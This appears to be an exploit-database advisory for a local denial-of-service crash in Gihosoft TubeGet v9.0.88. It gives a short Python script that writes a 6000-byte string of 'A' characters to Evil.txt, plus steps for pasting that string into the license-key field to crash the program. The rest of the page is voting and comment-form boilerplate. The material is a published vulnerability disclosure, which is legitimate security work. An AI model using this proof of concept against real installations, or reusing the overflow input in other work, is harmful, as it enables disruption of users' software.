Gihosoft TubeGet v9.0.88 Denial of Service Exploit

2023.03.08

Achilles (PL)

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Gihosoft TubeGet v9.0.88 Denial of Service Exploit
# Date: 07.03.2023
# Vendor Homepage:https://www.gihosoft.com
# Software Link:  https://www.gihosoft.com/download/?id=tubeget
# Exploit Author: Achilles
# Tested Version: v9.0.88
# Tested on: Windows 7 x64
#            


# 1.- Run python code :Gihosoft_TubeGet.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Gihosoft_TubeGet and Click 'I already have the key'
# 4.- Paste the content of EVIL.txt into the Fields
# 5.- Click 'Activate' and you will see a crash.
 
 
 
#!/usr/bin/env python
buffer = "\x41" * 6000
 
try:
        f=open("Evil.txt","w")
        print "[+] Creating %s bytes evil payload.." %len(buffer)
        f.write(buffer)
        f.close()
        print "[+] File created!"
except:
        print "File cannot be created"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Gihosoft TubeGet v9.0.88 Denial of Service Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.